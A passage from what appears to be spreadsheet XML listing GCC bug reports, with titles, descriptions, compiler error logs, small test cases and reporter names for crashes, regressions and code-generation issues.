 (define_insn_and_split *addsi3_compact
-  [(set (match_operand:SI 0 arith_reg_dest =r&amp;r)
+  [(set (match_operand:SI 0 arith_reg_dest =r&amp;u)
 	(plus:SI (match_operand:SI 1 arith_operand %0r)
 		 (match_operand:SI 2 arith_or_int_operand rI08rn)))]
   TARGET_SH1</t>
  </si>
  <si>
    <t>GCC-1663</t>
  </si>
  <si>
    <t>bug in loop.c</t>
  </si>
  <si>
    <t>In loop.c emit_insn_before should be replaced by 
loop_insn_emit_before if used with a where_insn.
Where_insn could be zero and that will crash if passed	
to emit_insn_before. Context loop.c 7940
 		/* Insn doesn't support that constant or invariant.  Copy it
		   into a register (it will be a loop invariant.)  */
		tem = gen_reg_rtx (GET_MODE (v-&gt;new_reg))
-		emit_insn_before (gen_move_insn (tem copy_rtx (v-&gt;add_val))
-				  where_insn)
+		loop_insn_emit_before (loop where_bb where_insn
+                                      gen_move_insn (tem copy_rtx (v-&gt;add_val)))
Release:
gcc-2.97 latest
Environment:
S/390</t>
  </si>
  <si>
    <t>hpenner</t>
  </si>
  <si>
    <t>GCC-2187</t>
  </si>
  <si>
    <t>/usr/include/_G_config.h:53: Internal error: Segmentation fault.</t>
  </si>
  <si>
    <t>In file included from /usr/include/_G_config.h:45
                 from /usr/include/libio.h:31
                 from /usr/include/stdio.h:58
                 from icq_sniff.c:41:
/usr/include/gconv.h:71: parse error before `size_t'
/usr/include/gconv.h:84: parse error before `size_t'
/usr/include/gconv.h:94: parse error before `size_t'
/usr/include/gconv.h:170: parse error before `size_t'
/usr/include/gconv.h:170: warning: no semicolon at end of struct or union
/usr/include/gconv.h:173: parse error before `}'
/usr/include/gconv.h:173: warning: data definition has no type or storage class
In file included from /usr/include/libio.h:31
                 from /usr/include/stdio.h:58
                 from icq_sniff.c:41:
/usr/include/_G_config.h:47: field `__cd' has incomplete type
/usr/include/_G_config.h:50: field `__cd' has incomplete type
/usr/include/_G_config.h:53: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Release:
unknown
Environment:
Linux 7.0
kernel 2.2.16-22
How-To-Repeat:
use gcc to compile include library path /usr/include/linux</t>
  </si>
  <si>
    <t>klau</t>
  </si>
  <si>
    <t>GCC-81793</t>
  </si>
  <si>
    <t>gcc.dg/pie-static-[12].c FAIL</t>
  </si>
  <si>
    <t>The new testcases gcc.dg/pie-static-[12].c fail on powerpc-linux:
spawn -ignore SIGHUP /home/segher/build/tot/gcc/xgcc -B/home/segher/build/tot/gcc/ /home/segher/src/gcc/gcc/testsuite/gcc.dg/pie-static-1.c -fno-diagnostics-show-caret -fdiagnostics-color=never -static -fpie -pie -lm -m32 -o ./pie-static-1.exe
/home/segher/tot/powerpc64-unknown-linux-gnu/bin/ld: cannot find -lm
/home/segher/tot/powerpc64-unknown-linux-gnu/bin/ld: cannot find -lc</t>
  </si>
  <si>
    <t>segher</t>
  </si>
  <si>
    <t>GCC-21706</t>
  </si>
  <si>
    <t>MAXPATHLEN usage in [gcc]/gcc/tlink.c</t>
  </si>
  <si>
    <t>Please do not use MAXPATHLEN it is a arbitrary limit and is not
defined on GNU.  Currently gcc 4.0.0 is unbuildable on GNU since
[gcc]/gcc/tlink.c assumes that MAXPATHLEN is defined.  Please do not
use these kind of limits in GNU programs.
Suggested fix is to declare initial_cwd as:
  char *initial_cwd
and then instead of doing:
  getcwd (initial_cwd sizeof (initial_cwd))
do:
  initial_cwd = getcwd (NULL 0)
Note: getcwd (NULL 0) is a GNU extention and might not be available
on non-GNU platforms.  (End of Note)
Sorry for not supplying a patch happy hacking.</t>
  </si>
  <si>
    <t>ams</t>
  </si>
  <si>
    <t>GCC-44482</t>
  </si>
  <si>
    <t>some warnings in libgcc amd64-darwin 4.5.0</t>
  </si>
  <si>
    <t>note this is later bootstrap stages so shouldn't matter what the bootstrap compiler was (assuming it compiled the compiler reasonably correctly)
For the missing prototypes I suggest you just put them right there:
void Foo(void)
void Foo(void)
{
  ...
}
for the uninitialized I suggest just initializing them and not worrying about it.
For the cast I already posted a patch adding const.
The shifts are buried in macros and I didn't look so not sure.
Personally if I want (a &lt;&lt; 32) I'd just do ((a &lt;&lt; 31) &lt;&lt; 1)..or uh just 0
but that may or may not be relevant here.
_darwin10_Unwind_FindEnclosingFunction I didn't look at.
I'll maybe come back to this myself hopefully that's not an abuse of gcc bugzilla (esp. given that this is not using -disable-bootstrap so not a terrible bug report).
I'm surprised -Werror isn't used here.
I suggest -Wmissing-prototypes only apply to callers not implementers? I realize it is a tradeoff because you want to make sure there is a prototype somewhere for callers (though not really for libgcc math helpers...) and forcing the implementor to pull that in is a reasonable way to make that so.
/home/jayk/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2.c: In function 'uw_init_context_1':
/home/jayk/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2.c:1452:5: warning: missing initializer
/home/jayk/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2.c:1452:5: warning: (near initialization for 'once_regsizes.__reserved')
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde-darwin.c: At top level:
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde-darwin.c:279:1: warning: no previous prototype for '_darwin10_Unwind_FindEnclosingFunction'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -m32 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -Wno-missing-prototypes -Wno-type-limits -o fixunstfsi_s.o -MT fixunstfsi_s.o -MD -MP -MF fixunstfsi_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/fixunstfsi.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/fixunstfsi.c: In function '__fixunstfsi':
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/fixunstfsi.c:42:3: warning: left shift count &gt;= width of type
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -m32 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -Wno-missing-prototypes -Wno-type-limits -o multf3_s.o -MT multf3_s.o -MD -MP -MF multf3_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c: In function '__multf3':
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c:38:1: warning: 'R_e' may be used uninitialized in this function
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o darwin-64_s.o -MT darwin-64_s.o -MD -MP -MF darwin-64_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/darwin-64.c
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o addtf3_s.o -MT addtf3_s.o -MD -MP -MF addtf3_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/addtf3.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/addtf3.c:35:8: warning: no previous prototype for '__addtf3'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o divtf3_s.o -MT divtf3_s.o -MD -MP -MF divtf3_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c:35:8: warning: no previous prototype for '__divtf3'
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c: In function '__divtf3':
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c:38:1: warning: 'R_e' may be used uninitialized in this function
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o eqtf2_s.o -MT eqtf2_s.o -MD -MP -MF eqtf2_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/eqtf2.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/eqtf2.c:35:9: warning: no previous prototype for '__eqtf2'
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/eqtf2.c:51:1: warning: no previous prototype for '__netf2'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o getf2_s.o -MT getf2_s.o -MD -MP -MF getf2_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/getf2.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/getf2.c:35:9: warning: no previous prototype for '__getf2'
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/getf2.c:51:1: warning: no previous prototype for '__gttf2'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o letf2_s.o -MT letf2_s.o -MD -MP -MF letf2_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/letf2.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/letf2.c:35:9: warning: no previous prototype for '__letf2'
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/letf2.c:51:1: warning: no previous prototype for '__lttf2'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o multf3_s.o -MT multf3_s.o -MD -MP -MF multf3_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c:35:8: warning: no previous prototype for '__multf3'
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c: In function '__multf3':
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/multf3.c:38:1: warning: 'R_e' may be used uninitialized in this function
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o negtf2_s.o -MT negtf2_s.o -MD -MP -MF negtf2_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/negtf2.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/negtf2.c:35:8: warning: no previous prototype for '__negtf2'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o subtf3_s.o -MT subtf3_s.o -MD -MP -MF subtf3_s.dep -DSHARED -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/subtf3.c
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/config/soft-fp/subtf3.c:35:8: warning: no previous prototype for '__subtf3'
/Users/jay/obj/gcc/./gcc/xgcc -B/Users/jay/obj/gcc/./gcc/ -B/Users/jay/amd64-darwin/bin/ -B/Users/jay/amd64-darwin/lib/ -isystem /Users/jay/amd64-darwin/include -isystem /Users/jay/amd64-darwin/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/Users/jay/src/gcc-4.5.0/libgcc -I/Users/jay/src/gcc-4.5.0/libgcc/. -I/Users/jay/src/gcc-4.5.0/libgcc/../gcc -I/Users/jay/src/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o unwind-dw2-fde-darwin.o -MT unwind-dw2-fde-darwin.o -MD -MP -MF unwind-dw2-fde-darwin.dep -fexceptions -c /Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde-darwin.c -fvisibility=hidden -DHIDE_EXPORTS
In file included from /Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde-darwin.c:36:0:
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde.h: In function 'last_fde':
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde.h:173:3: warning: cast discards qualifiers from pointer target type
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde-darwin.c: At top level:
/Users/jay/src/gcc-4.5.0/libgcc/../gcc/unwind-dw2-fde-darwin.c:279:1: warning: no previous prototype for '_darwin10_Unwind_FindEnclosingFunction'</t>
  </si>
  <si>
    <t>jay.krell</t>
  </si>
  <si>
    <t>GCC-49172</t>
  </si>
  <si>
    <t>[C++0x][constexpr] References should be declarable with constexpr</t>
  </si>
  <si>
    <t>This is a reminder entry to realize the FDIS change that references can now be declared as constexpr (7.1.5 p9).
gcc 4.7.0 20110521 (experimental) in C++0x mode rejects the following code with errors at the positions #1 and #2:
//---
void g() {}
constexpr void( // #1
int i
constexpr int const // #2
//---
error: 'const' qualifiers cannot be applied to 'void (&amp;)()'|
error: 'const' qualifiers cannot be applied to 'const int&amp;'
This code should be accepted.</t>
  </si>
  <si>
    <t>GCC-2681</t>
  </si>
  <si>
    <t>Attempting to compile public gated code and getting segmentation fault</t>
  </si>
  <si>
    <t>Downloaded gated-public code from gated.org after having loaded Red Hat Linux from purchased 7.0 disks.  Ran the ./configure and the make depend successfully.  Then when running make I received this error:
[pritchj@localhost gated-public-3_6]$ make
Making all in src
make[1]: Entering directory `/home/pritchj/gated-public-3_6/src'
make  all-recursive
make[2]: Entering directory `/home/pritchj/gated-public-3_6/src'
Making all in smux
make[3]: Entering directory `/home/pritchj/gated-public-3_6/src/smux'
gcc -DHAVE_CONFIG_H -I. -I. -I../../src -I. -I./../gated -I./../gatedcompat -I./
..    -g -O2 -c smux.c
smux.c: In function `smux_tree_reset':
smux.c:184: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
make[3]: *** [smux.o] Error 1
make[3]: Leaving directory `/home/pritchj/gated-public-3_6/src/smux'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/pritchj/gated-public-3_6/src'
make[1]: *** [all-recursive-am] Error 2
make[1]: Leaving directory `/home/pritchj/gated-public-3_6/src'
make: *** [all-recursive] Error 1
[pritchj@localhost gated-public-3_6]$
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Red Hat Linux - Server
How-To-Repeat:
I can repeat by simply rerunning make.</t>
  </si>
  <si>
    <t>GCC-43502</t>
  </si>
  <si>
    <t>[C++0x] uninitialised read in grokfndecl() with lambda functions cause -fcompare-debug failures</t>
  </si>
  <si>
    <t>Command line:
g++ -std=c++0x testcase.cpp
---- testcase.cpp ----
void f() { []{}() }
----------------------
valgrind shows uninitialised read with this testcase
Tested revisions:
r157675 - fail
Valgrind output:
$ valgrind --trace-children=yes -q /mnt/svn/gcc-trunk/binary-157675-lto/bin/g++ -std=c++0x testcase.cpp 
==11819== Conditional jump or move depends on uninitialised value(s)
==11819==    at 0x4D59C8: grokfndecl (decl.c:6657)
==11819==    by 0x4DC9E2: grokdeclarator (decl.c:9301)
==11819==    by 0x4DDD52: grokmethod (decl.c:12657)
==11819==    by 0x578109: cp_parser_lambda_expression (parser.c:7409)
==11819==    by 0x56BA6E: cp_parser_primary_expression (parser.c:3344)
==11819==    by 0x5802BA: cp_parser_postfix_expression (parser.c:4741)
==11819==    by 0x569BE7: cp_parser_unary_expression (parser.c:5667)
==11819==    by 0x571A27: cp_parser_binary_expression (parser.c:6337)
==11819==    by 0x571F2A: cp_parser_assignment_expression (parser.c:6548)
==11819==    by 0x5722B9: cp_parser_expression (parser.c:6694)
==11819==    by 0x5727DB: cp_parser_expression_statement (parser.c:7809)
==11819==    by 0x564145: cp_parser_statement (parser.c:7674)
==11819==</t>
  </si>
  <si>
    <t>GCC-6971</t>
  </si>
  <si>
    <t>Internal compiler error / compiler SIGSEGV</t>
  </si>
  <si>
    <t>Compiling the test code (as attached) the compiler 
reports an internal compiler error or crashes: 
Removing TONS of code to get a minimal example made the 
SIGSEGVs vanish the internal errors remaining: 
gcc -c crashme.cc -Wno-non-template-friend -DBUG=0
crashme.cc: In function `void internal_vect::mult_mv(internal_vect::vector&amp; 
   const internal_vect::matrix&amp; const
   internal_vect::vector&amp;) [with int r = 10 
   int c = 10 int N = 3]':
crashme.cc:53:   instantiated from `void 
   vect::operator*=(vect::Vector&amp; const 
   vect::Matrix&amp;) [with int N = 10]'
crashme.cc:89:   instantiated from here
crashme.cc:37: Internal compiler error in c_expand_expr 
   at c-common.c:3650
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Similar thing with
gcc -c crashme.cc -Wno-non-template-friend -DBUG=1
(Please don't tell me that I shall make the demo code 
even shorter. I already spent two hours or more to strip 
it down to that size removing any individual line will 
prevent the bug from showing up.)
Release:
gcc-3.1.1
Environment:
Linux / i686
How-To-Repeat:
Compile example code (as attached)</t>
  </si>
  <si>
    <t>wwieser</t>
  </si>
  <si>
    <t>GCC-32961</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression]: Gcc has different requirements for x86 shift xmm intrinsics</t>
  </si>
  <si>
    <t>I have some code that uses _mm_slli_epi32 intrinsics and some other shift ones.  This code compiles fine in GCC 4.1/4.0 and ICC 9.1.
I tried compiling it with GCC 4.2 and I get the error
testt.c:4: error: shift must be an immediate
_mm_slli_epi32 is defined as:
__m128i _mm_slli_epi32 (__m128i m int  count)
Unfortunately it seems like GCC 4.2 is requiring count to be an immediate.  If an immediate were intended to be required I believe it would be named int imm instead of int count like how _mm_slli_si128 is defined.
Here's a test case that compiles with ICC 9.1 GCC 4.0 and GCC 4.1 but not GCC 4.2:
#include 
void a( int n ) {
	__m128i a
	a = _mm_slli_epi32( a n )
}
I've also tried different flags including both -m32 and -m64 to see if it was an issue with that.  Nothing fixed it.</t>
  </si>
  <si>
    <t>mikelikespie</t>
  </si>
  <si>
    <t>GCC-36584</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] Stack is not aligned correctly in recursive function</t>
  </si>
  <si>
    <t>The example that will be attached in the next comment exhibits a problem with recursive functions. It looks that gcc doesn't align stack correctly if the only remaining call (after inlining?) in the function is the call to itself.
Compiling the test source with -O3 -m32 produces:
sbisect:
-4
-8	pushl	%ebp
	movl	%esp %ebp
-12	pushl	%edi
-16	pushl	%esi
-20	pushl	%ebx
-196	subl	$176 %esp
	movl	32(%ebp) %eax
	...
	movl	%eax 4(%esp)
0xC4!!	call	sbisect
	movl	40(%ebp) %ecx
	...
^^^^ offset from %esp at call site.
This violates assumption that %esp is aligned to 16 bytes at call sites. When program recurses into the function the frame gets unaligned leading to segfaults when aligned insns are used to access the frame.</t>
  </si>
  <si>
    <t>GCC-53056</t>
  </si>
  <si>
    <t>poor code generated for ARM NEON with vector types in structs</t>
  </si>
  <si>
    <t>Consider the following snippet:
typedef int vi16 __attribute__((vector_size(16*sizeof(int))))
vi16 add(vi16 a vi16b) {
  return a + b
}
compile with arm-linux-gnueabi-gcc-4.7 -O2 -march=armv7-a -mhard-float -mfpu=neon
Some fairly good code is produced:
        sub     sp sp #8
        str     r4 [sp #-4]!
        fstmfdd sp! {d8 d9 d10 d11 d12 d13}
        add     ip sp #52
        add     r4 sp #116
        vldmia  r4 {d24-d31}
        stmia   ip {r2 r3}
        vldmia  ip {d6-d13}
        vadd.i32        q8 q3 q12
        vadd.i32        q9 q4 q13
        vadd.i32        q10 q5 q14
        vadd.i32        q11 q6 q15
        vstmia  r0 {d16-d23}
        fldmfdd sp! {d8 d9 d10 d11 d12 d13}
        ldmfd   sp! {r4}
        add     sp sp #8
        bx      lr
However the the vector is embedded in a struct the code generation becomes awful.
typedef struct A {
  vi16 v
} A
vi16 add1(A a A b) {
  return a.v + b.v
}
// Same code as add1
vi16 add2(A a A b) {
  vi16* av = 
  vi16* bv = 
  return a.v + b.v
}
Both add1 and add2 produce the same code:
add1:
        @ args = 128 pretend = 8 frame = 128
        @ frame_needed = 0 uses_anonymous_args = 0
        @ link register save eliminated.
        sub     sp sp #8
        sub     sp sp #128
        add     r1 sp #128
        stmia   sp {r2 r3}
        stmia   r1 {r2 r3}
        ldr     r3 [sp #192]
        ldr     r2 [r1 #8]
        str     r3 [sp #64]
        ldr     r3 [sp #196]
        str     r2 [sp #8]
        ldr     r2 [r1 #12]
        str     r3 [sp #68]
        ldr     r3 [sp #200]
        ... lots and lots of load and store instructions.
But adding an optimization barrier to add2 produces similar code to the original example by making the compiler forget the origin of the pointer.
vi16 add3(A a A b) {
  vi16* av = 
  vi16* bv = 
  asm( : +r(av) +r(bv))  // causes good code to be generated.
  return *av + *bv
}</t>
  </si>
  <si>
    <t>drwowe</t>
  </si>
  <si>
    <t>GCC-30028</t>
  </si>
  <si>
    <t>[4.3 Regression] bcopy is wrongly converted to memcpy</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/builtins/memops-asm.c fails on sh-elf
with -O1 and higher.  It seems that bcopy is converted to memcpy
even when source and destination area are overlapped.  It looks
same tests start to fail also on ia64 and s390 testresults.  They
don't fail on i686 but a similar testcase
typedef __SIZE_TYPE__ size_t
extern void abort (void)
